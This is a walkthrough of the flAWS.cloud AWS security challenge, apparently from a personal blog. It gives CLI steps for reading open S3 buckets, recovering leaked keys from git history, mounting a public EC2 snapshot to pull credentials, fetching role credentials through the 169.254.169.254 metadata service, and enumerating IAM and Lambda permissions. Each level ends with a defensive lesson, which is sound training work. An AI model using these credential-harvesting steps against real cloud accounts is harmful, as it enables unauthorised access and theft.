flAWS.cloud Cloud Security Misconfigurations Challenge
Table of Contents
My Youtube Walk-through #
What’s the point of this? #
I believe the flAWS challenge was created to bring attention to common misconfigurations in the AWS cloud environment. A bulk of the beginning of the challenge has to do with s3 misconfigurations. Check out https://github.com/nagwww/s3-leaks which lists all the S3 bucket leaks from 2013 to 2022. These vulnerabilities leave product and user data easily accessible to attackers and individuals that would like to use that data for their exploits. Learning how these misconfigurations can go wrong and bringing awareness to this issue will hopefully prevent as many from happening because these leaks can be potentially very damaging to companies and their users.
Useful Stuff for this challenge #
- AWS CLI Docs
- Sign up for AWS Free tier: https://aws.amazon.com/free/
Level 1: Everyone has access #
The level just reads:
This level is buckets of fun. See if you can find the first sub-domain.
This is probably referring to S3 buckets because that’s the service AWS uses for storage. Also the service that a lot of companies have gotten into trouble for misconfiguring and leaving open to the internet.
All S3 buckets, when configured for web hosting, are given an AWS domain you can use to browse to it without setting up your own DNS. In this case, flaws.cloud can also be visited by going to http://flaws.cloud.s3-website-us-west-2.amazonaws.com/
Use nslookup, host, and/or dig to get more information on the domain #
nslookup flaws.cloud host flaws.cloud dig 126.96.36.199 host 188.8.131.52
List the contents of the bucket using aws cli #
aws s3 ls s3://flaws.cloud/ --region us-west-2 # run the command with no sign request aws s3 ls s3://flaws.cloud/ --region us-west-2 --no-sign-request
- the –no-sign-requests flag tells the CLI not to sign the request or look for credentials for executing the command
We could have also easily went on to flaws.cloud.s3.amazonaws.com since we know this is on s3, read the XML file, and found the secret file for level 2 there.
The Problem #
This level allowed everyone list permissions. Don’t open permissions to everyone. By default S3 buckets are private.
Level 2: Any authenticated AWS user has access #
The challenge lets us know this level is going to be the similar but we’ll need our own AWS creds
Create an IAM user on AWS #
- I created a user called demonstrata to demonstrate 😅
Configure profile on the CLI #
# input access key and access key id when prompted after this configuration command # probably safe choosing any region aws configure --profile demonstrata
List the contents of the bucket using aws CLI with –profile #
# aws credentialed access aws s3 --profile demonstrata ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
The Problem #
Don’t open permission to any authenticated AWS User, because those could be any user in the entirety of AWS.
Level 3: Keys get leaked in Git History #
The level says that it’s fairly similar to the last but we’ll be able to find some keys this time. How can we list what other buckets are? Hmmm.
Find a git repository #
- https://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud.s3.amazonaws.com/ bucket contains a git config file
- use sync command to duplicate this bucket locally in a directory on my machine I called “flaws”
Use git log to pull old commit history #
- use git log in the synced directory to pull the git commit history
- git checkout the first commit
- find access keys accidentally added to initial commit
Configure a new AWS CLI profile with creds and see what buckets it can access #
We find the URL to the next level: http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud/
The Problem #
I’ve personally found access keys on github before. It’s not an uncommon thing. Yeh, devs should be more careful with their commits but more so the problem is the secrets weren’t “rolled”. Access keys and any sort of passwords should be changed on some regular interval and when an incident happens like keys are leaked in a publicly accessible space then those keys should be immediately revoked.
Level 4: Accessing EC2 Instance Snapshots #
Our goal here is to get access to the ec2 instance here.
When we got to the website it asked for creds we don’t have
Identify Account ID of those creds we found in previous level #
aws --profile level3 sts get-caller-identity
# see all the snapshots associated with this user aws --profile level3 ec2 describe-snapshots --owner-id 975426262029
# we can even see more if we run the same cmd without owner id aws --profile level3 ec2 describe-snapshots
Create a Volume for the snapshot #
aws --profile demonstrata ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
Create ec2 instance from Snapshot #
- simply create an ec2 instance using the snapshot as a volume
- important things to configure here are using /dev/sde and delete on termination options
Configure Pem File #
- download the ssh key and put it in your operating folder
- change the permissions
chmod 400 flaws.pem
- ssh into the instance
ssh -i flaws.pem [email protected]'your-instance-public-ip'
Mount the Volume #
- this will list information about all available block devices
- mount the volume you added - should be 8gb
sudo mount /dev/xvde1 /mnt
Find keys in the Instance #
- navigate to /mnt/home/ubuntu and find the .sh file
- use the creds to login
The Problem #
People sometimes use snapshots to get access back to their own EC2’s when they forget the passwords. This also allows attackers to get access to things.
Level 5: The Magic IP 169.254.169.254 & Metadata Service #
The level asks us to use the proxy to figure out how to list the contents of level6 bucket level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud that has a hidden directory in it.
- If we try to go to the URL:
Access the Metadata service for flaws.cloud #
Might be useful to reference: https://www.rfc-editor.org/rfc/rfc3927
We can use the magic IP 169.254.169.254 to list the metadata events for the ec2
- We find some creds in the metadata
- Use new creds to find the secret directory at http://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/
The Problem #
Applications should not allow access to 169.254.169.254 or any local and private IP ranges. IAM roles should be restricted as much as possible.
Level 6: Read-Only? Permission Trouble #
This level we actually get some keys with SecurityAudit policy attached to them. But they might be able to do other “things”
Configure another profile with the keys and figure out what they can do #
aws --profile level6
- figure out what this profile has
aws --profile level6 iam get-user
- list policies attached to user
aws --profile level6 iam list-attached-user-policies --user-name Level6
- view the policies
aws --profile level6 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/MySecurityAudit --version-id v1 aws --profile level6 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4
Lambda Functions #
- using apigateway to list lambda functions
aws --region us-west-2 --profile level6 lambda list-functions
- get policy for lambda
aws --region us-west-2 --profile level6 lambda get-policy --function-name Level6
- we find something about the ability to execute an api with the id s33ppypa75
aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75"
- the stage name is “Prod”
- we use all the information we gathered to configure https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6
The Problem #
We shouldn’t hand out any permissions liberally, even permissions that only let users read meta-data or know what their permissions are. Information is power. We should remember that when configuring things.
The End #
Final Thoughts #
I’m still thinking about it to be honest…😂.
I think I would like to learn more about understanding lambda functions.